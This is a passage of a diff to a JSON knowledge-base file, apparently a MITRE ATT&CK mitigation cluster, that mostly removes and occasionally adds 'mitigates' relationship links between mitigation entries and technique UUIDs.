- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e0703d4f-3972-424a-8277-84004817e024",
"value": "Path Interception Mitigation - T1034"
},
@@ -9326,15 +7257,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d5dce4b9-f1fa-4c03-aff9-ce177246cb64",
"value": "Service Execution Mitigation - T1035"
},
@@ -9354,15 +7277,7 @@
"https://technet.microsoft.com/library/jj852168.aspx"
]
},
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f2cb6ce2-188d-4162-8feb-594f949b13dd",
"value": "Scheduled Task Mitigation - T1053"
},
@@ -9403,12 +7318,26 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "b2d03cea-aec1-45ca-9744-9ee583c1e1cc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
+ },
+ {
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
}
],
"uuid": "f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
@@ -9458,13 +7387,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7",
"tags": [
@@ -9493,13 +7415,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
"tags": [
@@ -9605,13 +7520,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "808e6329-ca91-4b87-ac2d-8eadc5f8f327",
"tags": [
@@ -9717,13 +7625,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -9746,15 +7647,7 @@
"https://attack.mitre.org/mitigations/T1037"
]
},
- "related": [
- {
- "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9ab7de33-99b2-4d8d-8cf3-182fa0015cc2",
"value": "Logon Scripts Mitigation - T1037"
},
@@ -9767,13 +7660,6 @@
]
},
"related": [
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
"tags": [
@@ -9787,13 +7673,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "609191bf-7d06-40e4-b1f8-9e11eb3ff8a6",
@@ -9812,15 +7691,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7c39ebbf-244e-4d1c-b0ac-b282453ece43",
"value": "Process Hollowing Mitigation - T1093"
},
@@ -9840,20 +7711,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"tags": [
@@ -9881,15 +7738,7 @@
"https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal"
]
},
- "related": [
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ec42d8be-f762-4127-80f4-f079ea6d7135",
"value": "Indicator Blocking Mitigation - T1054"
},
@@ -9906,15 +7755,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c95c8b5c-b431-43c9-9557-f494805e2502",
"value": "Software Packing Mitigation - T1045"
},
@@ -9926,15 +7767,7 @@
"https://attack.mitre.org/mitigations/T1074"
]
},
- "related": [
- {
- "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4320b080-9ae9-4541-9b8b-bcd0961dbbbd",
"value": "Data Staged Mitigation - T1074"
},
@@ -9946,15 +7779,7 @@
"https://attack.mitre.org/mitigations/T1480"
]
},
- "related": [
- {
- "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c61e2da1-f51f-424c-b152-dc930d4f2e70",
"value": "Environmental Keying Mitigation - T1480"
},
@@ -10075,15 +7900,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f6469191-1814-4dbe-a081-2a6daf83a10b",
"value": "Process Discovery Mitigation - T1057"
},
@@ -10101,15 +7918,7 @@
"https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077"
]
},
- "related": [
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5c49bc54-9929-48ca-b581-7018219b5a97",
"value": "Account Discovery Mitigation - T1087"
},
@@ -10125,15 +7934,7 @@
"https://www.us-cert.gov/ncas/alerts/TA13-175A"
]
},
- "related": [
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d45f03a8-790a-4f90-b956-cd7e5b8886bf",
"value": "Valid Accounts Mitigation - T1078"
},
@@ -10146,15 +7947,7 @@
"https://attack.mitre.org/mitigations/T1079"
]
},
- "related": [
- {
- "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "24478001-2eb3-4b06-a02e-96b3d61d27ec",
"value": "Multilayer Encryption Mitigation - T1079"
},
@@ -10171,15 +7964,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ed202147-4026-4330-b5bd-1e8dfa8cf7cc",
"value": "Modify Registry Mitigation - T1112"
},
@@ -10193,15 +7978,7 @@
"https://technet.microsoft.com/en-us/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "943d370b-2054-44df-8be2-ab4139bde1c5",
"value": "Authentication Package Mitigation - T1131"
},
@@ -10218,15 +7995,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "51b37302-b844-4c08-ac98-ae6955ed1f55",
"value": "Screen Capture Mitigation - T1113"
},
@@ -10243,15 +8012,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "383caaa3-c46a-4f61-b2e3-653eb132f0e7",
"value": "Email Collection Mitigation - T1114"
},
@@ -10263,15 +8024,7 @@
"https://attack.mitre.org/mitigations/T1141"
]
},
- "related": [
- {
- "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8a61f6b9-6b7a-4cf2-8e08-f1e26434f6df",
"value": "Input Prompt Mitigation - T1141"
},
@@ -10288,15 +8041,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "19edfa02-1a5f-47e4-ad82-3288f57f64cf",
"value": "Clipboard Data Mitigation - T1115"
},
@@ -10308,15 +8053,7 @@
"https://attack.mitre.org/mitigations/T1161"
]
},
- "related": [
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "77fd4d73-6b79-4593-82e7-e4a439cc7604",
"value": "LC_LOAD_DYLIB Addition Mitigation - T1161"
},
@@ -10331,15 +8068,7 @@
"https://technet.microsoft.com/en-us/library/cc733026.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82fbc58b-171d-4a2d-9a20-c6b2a716bd08",
"value": "Code Signing Mitigation - T1116"
},
@@ -10356,15 +8085,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8bd1ae32-a686-48f4-a6f8-470287f76152",
"value": "Automated Collection Mitigation - T1119"
},
@@ -10378,15 +8099,7 @@
"https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6"
]
},
- "related": [
- {
- "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c7e49501-6021-414f-bfa1-94519d8ec314",
"value": "Template Injection Mitigation - T1221"
},
@@ -10403,15 +8116,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d",
"value": "Audio Capture Mitigation - T1123"
},
@@ -10424,15 +8129,7 @@
"https://attack.mitre.org/mitigations/T1132"
]
},
- "related": [
- {
- "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fcbe8424-eb3e-4794-b76d-e743f5a49b8b",
"value": "Data Encoding Mitigation - T1132"
},
@@ -10449,15 +8146,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d9f4b5fa-2a39-4bdf-b40a-ea998933cd6d",
"value": "Video Capture Mitigation - T1125"
},
@@ -10484,15 +8173,7 @@
"https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html"
]
},
- "related": [
- {
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "62ae52c9-7197-4f5b-be1d-10d2e1df2c96",
"value": "Domain Fronting Mitigation - T1172"
},
@@ -10507,15 +8188,7 @@
"https://attack.mitre.org/mitigations/T1182"
]
},
- "related": [
- {
- "dest-uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "95c29444-49f9-49f7-8b20-bcd68d8fcaa6",
"value": "AppCert DLLs Mitigation - T1182"
},
@@ -10527,15 +8200,7 @@
"https://attack.mitre.org/mitigations/T1192"
]
},
- "related": [
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ad7f983d-d5a8-4fce-a38c-b68eda61bf4e",
"value": "Spearphishing Link Mitigation - T1192"
},
@@ -10547,15 +8212,7 @@
"https://attack.mitre.org/mitigations/T1143"
]
},
- "related": [
- {
- "dest-uuid": "04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fae44eea-caa7-42b7-a2e2-0c815ba81b9a",
"value": "Hidden Window Mitigation - T1143"
},
@@ -10567,15 +8224,7 @@
"https://attack.mitre.org/mitigations/T1136"
]
},
- "related": [
- {
- "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9a5b7194-88e0-4579-b82f-e3c27b8cca80",
"value": "Create Account Mitigation - T1136"
},
@@ -10587,15 +8236,7 @@
"https://attack.mitre.org/mitigations/T1138"
]
},
- "related": [
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cfc2d2fc-14ff-495f-bd99-585be47b804f",
"value": "Application Shimming Mitigation - T1138"
},
@@ -10607,15 +8248,7 @@
"https://attack.mitre.org/mitigations/T1193"
]
},
- "related": [
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8f6b5ca6-263a-4ea9-98f3-afd2a3cd8119",
"value": "Spearphishing Attachment Mitigation - T1193"
},
@@ -10627,22 +8260,7 @@
"https://attack.mitre.org/mitigations/T1139"
]
},
- "related": [
- {
- "dest-uuid": "44dca04b-808d-46ca-b25f-d85236d4b9f8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ace4daee-f914-4707-be75-843f16da2edf",
"value": "Bash History Mitigation - T1139"
},
@@ -10654,15 +8272,7 @@
"https://attack.mitre.org/mitigations/T1144"
]
},
- "related": [
- {
- "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158",
"value": "Gatekeeper Bypass Mitigation - T1144"
},
@@ -10674,22 +8284,7 @@
"https://attack.mitre.org/mitigations/T1145"
]
},
- "related": [
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f27ef4f2-71fe-48b6-b7f4-02dcac14320e",
"value": "Private Keys Mitigation - T1145"
},
@@ -10701,15 +8296,7 @@
"https://attack.mitre.org/mitigations/T1147"
]
},
- "related": [
- {
- "dest-uuid": "ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "12cba7de-0a22-4a56-b51e-c514c67c3b43",
"value": "Hidden Users Mitigation - T1147"
},
@@ -10722,15 +8309,7 @@
"https://www.symantec.com/connect/articles/ssh-and-ssh-agent"
]
},
- "related": [
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "41cff8e9-fd05-408e-b3d5-d98c54c20bcf",
"value": "SSH Hijacking Mitigation - T1184"
},
@@ -10742,15 +8321,7 @@
"https://attack.mitre.org/mitigations/T1149"
]
},
- "related": [
- {
- "dest-uuid": "a0a189c8-d3bd-4991-bf6f-153d185ee373",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "6e7db820-9735-4545-bc64-039bc4ce354b",
"value": "LC_MAIN Hijacking Mitigation - T1149"
},
@@ -10762,15 +8333,7 @@
"https://attack.mitre.org/mitigations/T1165"
]
},
- "related": [
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94927849-03e3-4a07-8f4c-9ee21b626719",
"value": "Startup Items Mitigation - T1165"
},
@@ -10782,15 +8345,7 @@
"https://attack.mitre.org/mitigations/T1157"
]
},
- "related": [
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dc43c2fe-355e-4a79-9570-3267b0992784",
"value": "Dylib Hijacking Mitigation - T1157"
},
@@ -10802,15 +8357,7 @@
"https://attack.mitre.org/mitigations/T1159"
]
},
- "related": [
- {
- "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "121b2863-5b97-4538-acb3-f8aae070ec13",
"value": "Launch Agent Mitigation - T1159"
},
@@ -10823,15 +8370,7 @@
"https://attack.mitre.org/mitigations/T1176"
]
},
- "related": [
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b52f41b9-ccf6-4da7-a6c0-167eeb71fbd8",
"value": "Browser Extensions Mitigation - T1176"
},
@@ -10848,15 +8387,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "c1a452f3-6499-4c12-b7e9-a6a0a102af76",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "34d6a2ef-370e-4d21-a34b-6208b7c78f31",
"value": "Process Doppelgänging Mitigation - T1186"
},
@@ -10872,15 +8403,7 @@
"https://technet.microsoft.com/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a6e5ca3-562f-4185-a323-f3b62b5b2e6b",
"value": "LSASS Driver Mitigation - T1177"
},
@@ -10894,15 +8417,7 @@
"https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices"
]
},
- "related": [
- {
- "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7009ba4d-83d4-4851-9fbb-e09e28497765",
"value": "Forced Authentication Mitigation - T1187"
},
@@ -10917,15 +8432,7 @@
"https://www.symantec.com/connect/blogs/malware-update-windows-update"
]
},
- "related": [
- {
- "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cb825b86-3f3b-4686-ba99-44878f5d3173",
"value": "BITS Jobs Mitigation - T1197"
},
@@ -10937,15 +8444,7 @@
"https://attack.mitre.org/mitigations/T1199"
]
},
- "related": [
- {
- "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "797312d4-8a84-4daf-9c56-57da4133c322",
"value": "Trusted Relationship Mitigation - T1199"
},
@@ -10957,15 +8456,7 @@
"https://attack.mitre.org/mitigations/T1495"
]
},
- "related": [
- {
- "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "70886857-0f19-4caa-b081-548354a8a994",
"value": "Firmware Corruption Mitigation - T1495"
},
@@ -10982,15 +8473,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "46acc565-11aa-40ba-b629-33ba0ab9b07b",
"value": "Resource Hijacking Mitigation - T1496"
},
@@ -11008,29 +8491,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0b3ee33e-430b-476f-9525-72d120c90f8d",
"value": "Data Destruction Mitigation - T1488"
},
@@ -11042,15 +8503,7 @@
"https://attack.mitre.org/mitigations/T1489"
]
},
- "related": [
- {
- "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "417fed8c-bd76-48b5-90a2-a88882a95241",
"value": "Service Stop Mitigation - T1489"
},
@@ -11126,13 +8579,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3298ce88-1628-43b1-87d9-0b5336b193d7",
"tags": [
@@ -11147,13 +8593,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
"tags": [
@@ -11196,6 +8635,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -11369,15 +8815,7 @@
"https://attack.mitre.org/mitigations/T1163"
]
},
- "related": [
- {
- "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c3cf2312-3aab-4aaf-86e6-ab3505430482",
"value": "Rc.common Mitigation - T1163"
},
@@ -11390,20 +8828,6 @@
]
},
"related": [
- {
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
"tags": [
@@ -11444,15 +8868,7 @@
"https://attack.mitre.org/mitigations/T1121"
]
},
- "related": [
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a90da496-b460-47e8-92e7-cc36eb00bd9a",
"value": "Regsvcs/Regasm Mitigation - T1121"
},
@@ -11659,13 +9075,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
"tags": [
@@ -11680,13 +9089,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "52759bf1-fe12-4052-ace6-c5b0cf7dd7fd",
"tags": [
@@ -11701,13 +9103,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5",
